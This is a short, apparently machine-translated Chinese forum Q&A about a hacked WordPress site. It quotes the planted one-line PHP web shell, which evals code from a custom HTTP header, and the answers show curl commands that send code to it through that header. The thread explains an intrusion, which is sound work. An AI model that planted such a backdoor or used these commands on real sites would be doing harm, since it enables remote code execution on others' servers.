所以不幸的是,我们的网站被黑客入侵了。
他们在我们的wp-admin目录中创建了一个名为wp-update的文件.php其中包含以下代码:
<?php @eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
我的问题是黑客如何使用 _SERVER 美元传入他的脚本?
是的,黑客可以将数据发送到 $_SERVER,它包含 HTTP 标头(参见文档(,其中包含一个简单的 curl 命令,您可以注入数据。
curl -H '4CD44849DA572F7C: echo "hello from server";' http://example.com
名称以HTTP_开头的$_SERVER超全局的属性只是 HTTP 请求标头的表示形式。
由于请求标头完全在发出请求的人的控制之下,因此在其中插入数据是微不足道的。
任何HTTP客户端都会让攻击者指定他们喜欢的任何标头。cURL 命令行客户端中的一个示例如下所示:
curl -H "4CD44849DA572F7C: code goes here" http://example.com/your-hacked.php